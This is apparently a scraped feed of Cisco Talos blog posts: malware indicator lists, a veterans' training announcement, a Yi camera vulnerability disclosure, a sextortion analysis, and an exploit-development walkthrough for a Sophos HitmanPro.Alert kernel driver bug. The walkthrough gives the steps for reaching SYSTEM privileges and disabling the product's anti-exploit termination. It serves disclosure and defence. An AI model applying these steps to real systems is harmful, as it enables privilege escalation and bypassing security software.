  • 01be29f0973f96218bf0554f2212ee60fe8563a9fa5e9f1cc04b948a02a5989a
  • 0280026374e8bc24bd0987abde9c8ded202bc489e0f718c2fbd87d541f2003e0
  • 03262248439bc3ed3af3cc12a50d3595a0230b6a01fd3c6e34838750a01a4b72
  • 03480a5dda4243eec0e9826a386729670c50c9cdcfd12109febf16695e7302ce
  • 03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb
  • 03c2c34bd542dde2d600697bb658399498be9ff74614ab938adb3f77a4183c4c
  • 0462f5a9a36956eb62b958203d66e1ad83268502f7ee6a2676e47d3829db1e03
  • 06c57ae21c9f839895f847a5d8895fdc89e878a615565772246c94887caaf6cb
  • 075b5ad9b36d79b3b14ad43decabdd7f07fbd3d428e890a14ee2af4969ba49e5
  • 08866b56758d4c7b783af2faa3465a9c3dcb2621b19ded098ccb17e25e4f685a
  • 08db11f50735c3f4d34d308bc190ae8db0cc6b291090716781ced208b13743fa
  • 0a00e118d1917356a4598d2e5f3a96f184726cb37e6be4cfa70ad233fcf5be8a
  • 0a0e93af895754435be151f0f09d3fcd542661c9e48314a82bfa4853be9212fe
  • 0a4d7fbd10835ba00bd6518598f0c3a4670207e52e4c8c57a5500f0c4059a017
  • 0a963367e108b56e58559846236f1896adcca5ec6e324330739e3b45d436e1dd
  • 0b675493051c7f99878bca3510c5054bbc071612557acb008e9ae8980c6364ed
  • 0b7143f5062cada3d26a97f59b10ddf8e2a73ea70dc97c7cb55a5ceef7e7e5d8
  • 0b76777a484d6e0304bfc0b0c06576a51bca2a5cf6a648dfdf67f296301af3d4
  • 0bc190d365d58acc24ec202637d87296c69c9f2d2dc4e7120d8f3b61ffc584bc
  • 0c4533fd8ae2a9629f474373ce2697059e978e8f5945b4421d092a7052b9c64c
  • 0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36
  • 0ef146b745e8b57ed0f3b0cd888f650fb8510670731e5c01419e13722178d1d9
  • 114f30f079e04714958728d7364b706dd8e88a241bd0771326d10c445d4fc95c

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \$Recycle.Bin\<USER-SID>\$RZ7KADN.txt
  • \$Recycle.Bin\<USER-SID>\$RYGDGS7.lnk
  • %AppData%\Mozilla\Firefox\Profiles\iv5rtgu3.default\key3.db
File Hashes
  • 2073825ad497c12861800c93527e49e8aa4afafe77d1a7af2922ab707c4b258e
  • 2c43a96efe6f36ef0e1e1ca7f4dfe34c83bdd1d99090a056d43955e70bae719f
  • 2ff58a8b69dcb0dbb1ef63430a925068d586860c84faa583988b92e2bb87ef25
  • 30a9b4c8db8eae33a1e9c35f6441e171cb8059a0f6c34bc8d377e064f3000008
  • 32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d
  • 32fb050134eefd9bba3f5a1d31c9727c0a25760e8b2342385b24b20a253e9512
  • 34c5950ff21c25a4acbc1801f881d205ba2cae42333bb04358cf5117eef645b2
  • 447e4f61b3e3a5ccf116346d228d1b80328a63e54fc71398e4894d70c22ff51d
  • 4d6ac5ccca2bab50f296a4e34a7bed16131f01fdf6864c2bee8efbfea449697b
  • 51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab
  • 581391e344bda3539189aef8252556f916bf27333e755765641a1485844b884f
  • 66ada213ce8d9756c1c711d216d45ef8cc84586a1dc46213ce8275d4f8a7d08f
  • 7d0ab4517139c8347e39af92cf8dafb9c71e80a8848cea25d7e4598292753fac
  • 7f49ac352ec83b003ca00b29acafdf5c08132f0bd060151312157773e06a887d
  • 8564af9b09f0ade9b372d76a0d53355587b28cc89afec83b9287cebe6dbce148
  • 8cca573e22a563ae4074007c9b5c5abd11316a0235f206242baf4936f3cff4fb
  • 91487940c217c106a1f70ea4f850db083396a8fd5c37e81c47d4cd01ef269906
  • 9813d3fa86989ca43ecc0db5684e642823abebca58161d8676276349bb5c53ea
  • b3be19db0aa19fc9588cb90d0ee5c39ae124e797b82ba1eeb02ba0b82c9a55f8
  • beb78637a890b73e150cc67b1c51108dc89e7b3e491ed22cc81695eda729e10f
  • c405942083f1d75a6de07f9270e94594cfd99b59c774f22bd2c214715822a851
  • c5405c94a49bd14155027aea5722bf253eeedd1a3d0d1d73a2580adb70a6def7
  • cc542bacf782757a362d3b6cfc54efe64f8abb860f7c997cf008cc0ae9ffcee6
  • d2f9541628e3178b1e6cead482d9983e1509edd3155244b42ac49f0a6919d690
  • d7ecfd142025e761006a446d1bd68a9f337eaf1f927fbc01fbbe336df39befae

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 103[.]235[.]47[.]123
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\347749632.exe
File Hashes
  • 0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8
  • 39ad7614f81cf505be13fb726d9a68585ebcfb4ba3c156e7974e23a71c8254f1
  • 41569db09055ec3bbd900f943c3049b6362be1fc08e73bf9403c6e0a684b5aed
  • 7f25aa88bb56ce9888d3959344307b5c7423f53ef1409f84534dd82f2520eb92
  • 856c90d502181b0297d792c67ab0d5e3d78fac4879e853beab00e10707e1c5dd
  • 99e9c70014473728f7cfac4704c4961cb9cf1e6cb015bb1da6bb095fea13ecaa
  • a4143241cfa447db8fa7d4ec5ef79a6bd0a78b853d8f461f209e1224ea09f34f
  • e957fa484e5b1b1c84a0f4d3e3561686fe6d289f703ec2ff1f4d9fec886e1344
  • f57061d301bce0ecb0b1caf8b0e0de238ecccd4f038f4e9a397ab1cdde57e9a2
  • fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 212[.]58[.]244[.]48
  • 208[.]91[.]197[.]13
Domain Names contacted by malware. Does not indicate maliciousness
  • lalecitinadesoja[.]com
  • downloads[.]bbc[.]co[.]uk
Files and or directories created
  • %LocalAppData%\Temp\1ii4ushk.rdy.ps1
  • %LocalAppData%\Temp\i3iu3ax4.unx.psm1
  • %AppData%\23C.exe
File Hashes
  • 05997180a42ca9c01720b1ee3e759bd1a408c0064bbdac0c72f56c9783102a1f
  • 07a8a906e93699e23b1b7fe6a190edf709d499efdb806a334d63d21e87d47fea
  • 0d4e2eeb6402ecbfed9d9f70a4386ba988d96baa4570944ad7d25fda4e1360b5
  • 1007b22475717247803c61a571c881bf50d93199f21559bfaa2b0651e3e88b99
  • 11cd2e32f5b99a2988d75e7c6b7b372645385fa0b2f266084cf79a674fa87d54
  • 12cb9af05b67398d8e32296f872fcf38485cb5bfb248882a039c901f917744c7
  • 199abec0369aa5b56ccf3e40104dec650c0c621a4bf9fe892cde4c649951d96c
  • 2436eb88be5cb4536470f00aa4e0b2204c938a7ccc1ab1512c51371c056083bb
  • 2b99f6c10d40f9437e4f81c102829e5dd177b7ba83f04d0b09ca13fd35d4f37a
  • 2e1d18fa4a0c1b7f1a840f0cbe366bed742fd882ba5ba7c32177fe4384d3feeb
  • 2fcb4649130e60c9ee30bc0109dd276dfc20b58873098466740c95bae14e8b16
  • 2fda76c3f4db61bd48ffefbe06625cbf33c84c9a99bfb5e4b078efab041786be
  • 4c7833eda85621233fcf983d797da0a473e4d17bc8a6b5572eb475e1132f9604
  • 4cf4a24b619e53b5155e2aa5eebcbd4a935b03bc2a99f703e955d26bfdc89834
  • 522dea36276bb7616dabda4f46e9bd93fb5fac7dc8c035e2677febac8a9ac268
  • 53bfd8dcca2dd1a702c80a92e52b6149c3b6d9dd69cfc616c6ece3931920aa0b
  • 56ee72c3cac7e50c20945307e9f58360e097782ee10a5577323f1cee22caeb3d
  • 5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7
  • 5dfef0b6f4f1b612edf80c8ab5cffc7556677bb07c53934963b550b60cf84474
  • 6534a9d590748b2301a3f804b75fe02ffee39acf82d2dbb93800a3f8923c9934
  • 6b83c696d85d8f467ee9ff306ef266c6b64c8cb4e0aad99f4b5627f6e2dd3c33
  • 6c891decc602dc22ae6084be690674afdb405c5b7072a0e8b46d77ba8e331237
  • 6da86b5ba028ddfd9646da6467cdaca4d698b72b165045561bcf7a65449dba85
  • 7546344c7c370e86f9975710269a9c965104d6084fe4b51d8713c37cd277c2da
  • 75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d

Screenshots of DetectionAMP




Indicators of Compromise
Registry Keys
  • N/A
  • qazwsxedc
IP Addresses contacted by malware. Does not indicate maliciousness
  • 52[.]1[.]22[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]easycounter[.]com
Files and or directories created
  • %WinDir%\cer61A0.tmp
  • %TEMP%\adminpak.msi
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\adminpak[1].exe
  • %WinDir%\cluster\clcfgsrv.inf
  • %WinDir%\cluster\cluadmin.exe
File Hashes
  • 04a44c6f9ee4b5f944038452d2669a9915e493f3d4aedd8603af6bcbf9fb157d
  • 075ef3a40de2c10d52140c02fc604654e60eb1231659122640d93884a8f639d8
  • 1ed41ccdce4f7c67dbeb57873ed69a0b53bd8c509a66f391fb4838cd26d32f88
  • 4e8da970321ee8e38f2fe918ce8755ce504d0c54ad579c7a2d388ed65aceca3f
  • 63562fa34ca55cbbc1f007ed6a199b625f277f02487d18c6a9a8e24354af6ea3
  • 72b02849c7cde8ba42dfe04edf18b0ede900c66187a9e38f5d16eaf84ddfbfbe
  • 764947d95583d3a134fc96d6ce06ce4175261d3b9b48d224238367054e187d93
  • 77515fa3f7bea9043e954ac8cb13917edd930d0e5d87f2cbc9fa4d44bd281161
  • 7ea545f0dd17684011d7bbdde7c004faccacd8edb6d011c4e023f2780279ae1f
  • 92e4863e96df84117c1288ceb692823a6d86c0b3a09f29a5cbc4af6a83a03415
  • 9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80
  • a36d16238efb3b5f2ba5e9c23dd1db26a6b08fce8fa1d824e3006bc05f12a75f
  • b63310bff942d0fe4f131fbb777737b110ab630876e784ac843e0c4dcdebde44
  • bdc574d0160c6566738b039122d702a47aa10080b096cc3ca2729a2a5ca5f6f6
  • cf7236e1d8783d00cd54d9d821a1067a2c08cd7cb67b0c091f5826784403f67a
  • d7096f8904ebef796193afca1737f99e65c07ac7cf3c999aa46b5e60428ca006
  • dba090f098676f7f4d5bd9e71a5b24cb1dfc71edb6b8a0dc06082a60730a81d0
  • ed2893a0c58fbfaf73acdd4d7a7c9d8626e8609573739e8f0bf11c88d4b07303
  • f9de2da81894bbde4f6baf5909c3f3f6a5d5fc61a8df97836fb8db14fbdb6006
  • ff453440448d5f950a573ab246092a3c80e33c7c9189d97d15539bf09c48211d

Screenshots of DetectionAMP


CyberVets U.S.A.: The mission after transition

Thu, 01/11/2018 - 16:48
Christopher Marshall, a veteran of the U.S. Navy, currently serves as Director of Cybersecurity Research for Cisco Talos Intelligence Group.

As a veteran of the U.S. Navy, I’ve had the opportunity to use some of the greatest technology this country has to offer — from night vision goggles, to thermal cameras, to radio and satellite command and control equipment — even the care and feeding of nuclear reactors. When it was time for me to transition from the military to the civilian world, my post-military career led me to work for the Cisco Talos Intelligence Group, where I’ve found that many who served are also excellent teammates in the fast-paced, ever-shifting domain of cybersecurity. These men and women exhibit leadership, teamwork, inclusion, integrity, efficiency, and (importantly) the ability to acquire technical prowess. These are highly desirable traits in any industry, especially one that is predicated on trust and a willingness to always learn and evolve.

Within the next few years, we are facing the global reality of nearly 2 million unfilled cybersecurity jobs, which poses a threat to our national security, businesses and the local community. At Cisco, and Talos in particular, we recognize the value veterans bring to the workplace. We strive to create opportunities for the training, hiring and advancement of veterans because of the intangibles they bring with them. A major obstacle we face in that endeavor is how to support the military community as they transition to the civilian workforce at a rate of over 200,000 each year. In November 2016, Virginia announced the Virginia Veterans Cyber Training (VVCT) program, or as we at Cisco call it, CyberVets USA. Leading the partnership alongside Amazon Web Services and (ISC)2, Palo Alto Networks, and Fortinet, Cisco launched a free online entry-level cyber training pilot for 200 veterans who want to work in Virginia’s cybersecurity industry.
Today, we are excited to announce a CyberVets USA program in Talos’ backyard here in Maryland with the help of Lt. Gov. Boyd Rutherford, in conjunction with a proclamation to make this November “Hire-a-Veteran Month.” Additionally, NetApp and the National Development group have joined on for the Maryland program. Developed to address a growing talent gap in the cybersecurity arena, CyberVets USA is an industry partnership of cyber-focused companies offering free training and certifications to the military and veteran community. In collaboration with the Departments of Labor, Commerce, and Veterans Affairs, as well as several of Maryland’s state colleges and universities, this program provides the training needed to develop the extrinsic skills to succeed in the cybersecurity workforce while capitalizing on the intrinsic values that hiring veterans brings to the commercial workforce. (To learn more, click here.)
Additionally, in the near future, Cisco will be launching other programs that include a targeted employer matching program, a proprietary matching engine to map military skills and newly earned certifications, linking veterans to the thousands of jobs posted by any one of Cisco’s 60,000 channel partners across the globe.
With the support of the governor’s office and the state of Maryland, the CyberVets USA program will identify, train, and help find next-generation tech jobs for the veteran and transitioning military population of Maryland, giving the vets their next mission after transition. I am proud to continue my journey with a company dedicated to serving those who served and look forward to welcoming veterans as they join the Cisco team.
To learn more, visit

Talos Vulnerability Deep Dive - TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability

Thu, 01/11/2018 - 13:00
Marcin Noga of Cisco Talos discovered this vulnerability.

After disclosing two vulnerabilities in Sophos HitmanPro.Alert on Thursday, Cisco Talos will show you the process of developing an exploit for one of these bugs. We will take a deep dive into TALOS-2018-0636/CVE-2018-3971 to show you the exploitation process.

Sophos HitmanPro.Alert is a threat-protection solution based on heuristic algorithms that detect and block malicious activity. Some of these algorithms need kernel-level access to gather the appropriate information they need. The software's core functionality has been implemented in the `hmpalert.sys` kernel driver by Sophos. This blog will show how an attacker could leverage TALOS-2018-0636 to build a stable exploit to gain SYSTEM rights on the local machine.

Vulnerability Overview
During our research, we found two vulnerabilities in the `hmpalert.sys` driver's IO control handler. For the purposes of this post, we will focus only on TALOS-2018-0636/CVE-2018-3971, an escalation of privilege vulnerability in Sophos HitmanPro.Alert. First, we will turn it into a reliable write-what-where vulnerability and then later into a fully working exploit.

First, we use the `OSR Device Tree` tool (Figure 1) to analyse the `hmpalert.sys` driver's access rights.

Figure 1. Device Tree application showing hmpalert device privilege settings

We can see that any user logged into the system can obtain a handler to the `hmpalert` device and send an I/O request to it. Keep in mind for building this exploit, as we mentioned in the original vulnerability blog post, the I/O handler related to this vulnerability is triggered by the IOCTL code `0x2222CC.` The vulnerable code looks similar to the one below.

Figure 2. Body of a vulnerable function
The nice thing is that we fully control the first three parameters of this function, but we do not control the source data completely (e.g. the `srcAddress` needs to point to some memory area related to the lsass.exe process) (line 12).

Additionally, data read from the lsass.exe process (line 23) is copied to the destination address the `dstAddress` parameter is pointing to (line 33).

With this basic information, we can construct the first proof of concept exploit to trigger the vulnerability:

Figure 3. Minimal proof of concept to trigger the vulnerability
This looks like it could work, but it's not enough to create a fully working exploit. We need to dig into the `inLsassRegions` function and see how exactly the `srcAddress` parameter is tested. We have to check if we will be able to predict this memory content and turn our limited `arbitrary write` access into a fully working `write-what-where` vulnerability.

Controlling the source
We need to dive into the `inLsassRegions` function to get more information about the `srcAddress` parameter:

Figure 4. The function responsible for checking if the `srcAddress` variable fits in one of the defined memory regions.We can see that there is an iteration over the `memoryRegionsList` list elements, which are represented by the `memRegion` structure. The `memRegion` structure is quite simple — it contains a field pointing to the beginning of the region and a second field that's the size of the region. The `srcAddress` value needs to fit into one of the `memoryRegionsList` elements boundaries. If this is the case, the function returns 'true' and the data is copied.

The function will return 'true' even if only the `srcAddress` value fits between the boundaries (line 21). If the `srcSize` value is larger than an available region space, the `srcSize` variable is updated with the available size line 26. The question is: What do these memory regions represent, exactly? The `initMemoryRegionList` function will give us an idea.

Figure 5. Initialization of memory regions list.We can see that the context of a current thread is switched to the `lsass.exe` process address space and then the `createLsaRegionList` function is called:

Figure 6. Various memory elements of the lsass.exe processes are added to the memory regions list.
Now we can see that the memory regions list is filled with elements from the `lsass.exe` PEB structure. There are ImageBase addresses regarding loaded and mapped DLLs added to the list, including the SizeOfImage (line 31), along with other information. Unfortunately, the `Lsass.exe` process is running as a service. This means with normal user access rights, we won't be able to read its PEB structure, but we can leverage the knowledge about the mapped DLLs in the exploit in the following way: System DLLs like `ntdll.dll` are mapped into each process under the same address, so we can copy bytes from the `lsass.exe` process memory region from these system DLLs into the memory location pointed to by the `dstAddress` parameter. With that in mind, we can start creating our exploit.

This is not a typical `write-what-where` vulnerability like you see in the common exploitation training class, but nevertheless, we don't need to be too creative to exploit it. The presented exploitation process is based on the research presented by Morten Schenk during his presentation at the BlackHat USA 2017 conference. It also includes modifications from Mateusz "j00ru" Jurczyk, which he included in his paper "Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)." With a few changes, we can use j00ru`s code, WCTF_2018_searchme_exploit.cpp, as a template for our exploit. These changes include:
  1. Removing entire codes related to pool feng-shui.
  2. Writing a class for memory operations using the found primitives in the hmpalert.sys driver.
  3. Updating the important exploit offsets based on the ntoskrnl.exe and the win32kbase.sys versions.
Then, we will be able to use the mentioned strategy from Morten and Mateusz:
  1. Leak addresses of certain kernel modules using the NtQuerySystemInformation API — We assume that our user operates at the `Medium IL` level.
  2. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of `nt!ExAllocatePoolWithTag.`
  3. Call the `NtGdiDdDDIGetContextSchedulingPriority`(`=ExAllocatePoolWithTag`) with the `NonPagedPool` parameter to allocate writable/executable memory.
  4. Write the ring-0 shellcode to the allocated memory buffer.
  5. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of the shellcode.
  6. Call the `NtGdiDdDDIGetContextSchedulingPriority`(`= shellcode`).
  1. The shellcode will escalate our privileges to SYSTEM access rights after copying a security TOKEN from the system process to our process.
Test environment
Tested on Windows: Build 17134.rs4_release.180410-1804 x64 Windows 10

Vulnerable product: Sophos HitmanAlert.Pro 3.7.8 build 750

Memory operation primitives
To simplify memory operations, we wrote a class using the found memory operation primitives in the hmpalert.sys driver.

Figure 7. The memory class implementation
The core `copy_mem` method is implemented like this:

Figure 8. The Memory::copy_mem method implementation

We initialize a couple of important elements inside the class constructor:

Figure 9. The memory class constructor implementation
We can use the `write_mem` method to write a certain value to a specific address:

Figure 10. The memory class write_mem method implementationWe can not directly copy bytes defined in the `data` argument. Therefore, we need to search for each byte from the `data` argument in the `ntdll.dll` mapped image and then pass the address of the byte to the hmpalert driver via the `srcAddress` parameter. That way, byte by byte, will overwrite the data at the destination address `dstAddress` with bytes defined in the `data` argument. We can easily overwrite necessary kernel pointers and copy our shellcode to the allocated page by using this class:

Figure 11. Shellcode copy operation to an allocated page.
The rest of the exploit is straightforward, so we can leave the implementation as a task for the interested reader.

Fail — Zero-day protection really works!
Armed with a fully working exploit, we are ready to test it. If it works, we should get SYSTEM level privileges.

Figure 12. The elevated console is detected and terminated by the HitmanPro.Alert.It looks like our exploit has been detected by the `HitmanAlert.Pro's` anti-zero-day detection engine. Looking at the exploit log, it seems that its entire code was executed, but the spawned elevated console has been terminated.

Figure 13. At the end of the exploit, the console with elevated rights is executed.
We can see in the system event log that HitmanAlert.Pro logged an exploitation attempt and classified it as a local privilege escalation:

Figure 13. Event log showing that it was logged by HitmanAlert.Pro as an attempted privilege escalation.Using a zero-day to bypass anti-zero-day detection
We know that our exploit works correctly, but the problem is that it's terminated by the anti-exploitation engine during an attempt to spawn the elevated shell.

We can look at HitmanAlert.Pro's engine to find out where this function is implemented. The Microsoft Windows API provides the `PsSetCreateProcessNotifyRoutine,` which can be used to monitor process creation in the OS. Searching for this API call in the `hmpalert.sys` driver, IDA shows a couple of calls.

Figure 14. Registration of `ProcessNotifyRoutine` via `PsSetCreateProcessNotifyRoutine` API.We do see some places where it registers the callback routine. Let's look into the implementation of the `ProcessNotifyRoutine`. While stepping through it, we found the following code:

Figure 15. An implementation of `ProcessesKiller` function, responsible for the termination of potentially malicious processes.At line 44, you can see a call to the routine that's responsible for killing "dangerous/malicious" processes. As we can see at line 5, there is a condition checking whether a global variable `dword_FFFFF807A4FA0FA4` is set. If it is not set, the rest of the function code will not be executed. All we need to do is to overwrite the value of this global variable with a value of zero to avoid termination of our elevated console. The final portion of the exploit looks like this:

Figure 16. Overwriting a global variable in the `hmpalert.sys` driver to trick the `ProcessesKiller` function, allowing our spawned elevated console to execute.
Time to test our exploit in action.

Final exploit - LPE Windows 10 x64 / SMEP bypass

Due to the many anti-exploitation features in today's operating systems, weaponizing vulnerabilities can often be arduous, but this particular vulnerability shows that we can still use some Windows kernel-level flaws to easily exploit bugs in modern Windows systems. This deep dive showed how an attacker could take a vulnerability and weaponize it into a stable, usable exploit. Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis and provide additional deep-dive analysis when necessary. Check out or original disclosure here to find out how you can keep your system protected from this vulnerability.

Vulnerability Spotlight: Multiple Vulnerabilities in Yi Technology Home Camera

Wed, 31/10/2018 - 18:18
Vulnerabilities Discovered by Lilith [x_x] of Cisco Talos.


Cisco Talos is disclosing multiple vulnerabilities in the firmware of the Yi Technology Home Camera. In order to prevent the exploitation of these vulnerabilities, Talos worked with Yi Technology to make sure a newer version of the firmware is available to users. These vulnerabilities could allow an attacker to gain remote code execution on the devices via a command injection, bypass methods of network authentication, or disable the device.

The Yi Home Camera is an internet-of-things (IoT) home camera sold globally. The 27US version is one of the newer models sold in the U.S. and is the most basic model out of the Yi Technology camera lineup.

It includes all the functions that one would expect from an IoT device, including the ability to view the camera's feed from anywhere, offline storage, subscription-based cloud storage and easy setup.

There are many consequences to a security vulnerability within the firmware of this security camera. An attacker could exploit these vulnerabilities to:

  • Disable the camera to prevent it from recording.
  • Delete stored videos on the camera.
  • View video feeds from the camera.
  • Potentially launch attacks against the camera owner's phone app.
  • Act as a foothold into the home network to attack other devices inside.

This list is not complete, and many other consequences could occur, so Talos highly recommends that the devices are patched as soon as possible via the Yi Home application.


Due to the nature of IoT devices, more attack surfaces are available on a given device than a typical server or client program. For half of the vulnerabilities, physical access is required to exploit them, which obviously makes them less of a concern if the camera is stored safely inside of the venue that they are protecting, but for the other five vulnerabilities, there is a network attack vector, raising their severity and the importance of getting the latest firmware.

Before summarizing these network-based vulnerabilities, it is important to note that they are all made possible by TALOS-2018-0616, as all of these vulnerabilities are over cleartext protocols, either unencrypted UDP or HTTP. If the slight performance hit was taken to implement the core network functionality over HTTPS, these vulnerabilities would either not have been as severe, or not have been exploitable at all.

Denial of service:

TALOS-2018-0602 and TALOS-2018-0595 were both found within the p2p_tnp binary, which is the main controller for phone-to-camera and cloud-to-camera communication. That binary also implements a custom UDP peer-to-peer (p2p) protocol for all of the aforementioned features. In both vulnerabilities, some seemingly artifact opcodes could be accessed without authentication, which would allow an attacker to either permanently disable the video feed or cause unlimited memory to be allocated, both rendering the camera useless.

Remote Code Execution:

TALOS-2018-0567 is easily the most severe vulnerability out of the batch, requiring only the ability to respond to an HTTP request from the camera in order to hit a command injection and subsequent code execution. The vulnerable time_sync request happens extremely often as soon as the device connects to the network.

Administrative Access:

The last of the network-based vulnerabilities, TALOS-2018-0601 allows an attacker to reuse tokens that can be sniffed over the wire via TALOS-2018-0616 so that one sniffed token can be used an unlimited number of times by an attacker to access the p2p_tnp API that is normally reserved for the camera's owner via the Yi Home phone application. This access only lasts until the device reboots, at which point another token needs to be sniffed.

Physical and Local Attack Vectors:

As noted above, IoT devices tend to lend themselves to vulnerabilities with more unusual attack vectors, and the Yi Home Camera is no exception. Vulnerabilities were found via the firmware update functionality (TALOS-2018-0565, TALOS-2018-0584 and TALOS-2018-0566), the SSID that the camera connects to for wireless access (TALOS-2018-0580) and via the QR code that is used when setting up the device out of the box (TALOS-2018-0572 and TALOS-2018-0571). Because of this, it is suggested that these devices are not kept in areas where they are physically available to others, and once again, that the devices' firmware is updated as soon as possible.

Vulnerability Summaries

TALOS-2018-0565 -- Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0566 / CVE-2018-3891 - Yi Technology Home Camera 27US Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0567 -- Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2018-0571 / CVE-2018-3898-CVE-2018-3899 - Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US A specially QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0572 / CVE-2018-3900 - Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US A specially QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0580 / CVE-2018-3910 - Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability

An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.

TALOS-2018-0595 / CVE-2018-3928 - Yi Technology Home Camera 27US Notice_To Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted set of UDP packets can cause the settings to change, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

TALOS-2018-0601 / CVE-2018-3934 - Yi Technology Home Camera 27US Nonce Reuse Authentication Bypass Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.

TALOS-2018-0616 / CVE-2018-3947 - Yi Technology Home Camera 27US p2p_tnp Cleartext Data Transmission Vulnerability

An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US An attacker can sniff network traffic and trigger this vulnerability.

TALOS-2018-0602 / CVE-2018-3935 - Yi Technology Home Camera 27US CRCDec Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.

Versions Tested

The Yi Technology Home Camera 27US version of the firmware was used during the discovery of the vulnerabilities listed above.

Firmware at Yi Technology 


With the increased convenience of IoT devices, a new set of attack vectors arose that have not been as hardened as traditional ones. As such, Talos recommends that users apply these newly available firmware updates in order to ensure their continued and secure operation. This can be done via the Yi Home phone app, which will notify the user of this new firmware upon being opened. It is also recommended that the user checks the device's firmware version after the update, via the phone app, in order to ensure that the update did in fact occur.


The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules:
46190-46191. 46294-46295. 46780. 46870.

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

Anatomy of a sextortion scam

Wed, 31/10/2018 - 12:31
This blog was written by Jaeson Schultz.

Since this July, attackers are increasingly spreading sextortion-type attacks across the internet. Cisco Talos has been investigating these campaigns over the past few months. In many cases the spammers harvested email addresses and passwords from a publicly available data breach, and then used this data to facilitate their sextortion attacks. While the attackers do not actually have any compromising videos showing the victim, the emails claim to have explicit videos that they will distribute if the victim doesn't pay the extortion payment by a certain time. By including the recipient's password along with their demands for payment, the attackers hope to legitimize their claims about having compromising material concerning the victim. While these attacks have been in the wild for months, Talos wanted to take a closer look at some of these campaigns to see why users were being tricked into sending the attackers large amounts of bitcoin despite the attackers' empty threats. By examining some of the sextortion spam campaigns in detail, our researchers were able to gain insight into how these criminals operate.

An example of a sextortion email containing slight changes to the wording of the message body.

Sextortion Campaign Analysis
To facilitate a deeper understanding of sextortion scams, Talos extracted and analyzed messages related to two very similar sextortion spam campaigns. The first spam campaign we analyzed began on Aug.30, 2018, and the second campaign began Oct. 5, 2018. Both campaigns are still active at the time of writing this blog.

Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days' worth of spam. Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}[email protected]\.jp/
From =~ /[email protected]\d{3}\.edu/

Campaign Totals
In total, SpamCop received 233,236 sextortion emails related to these "Aaron Smith" sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.

Number of sextortion emails received by SpamCop over time

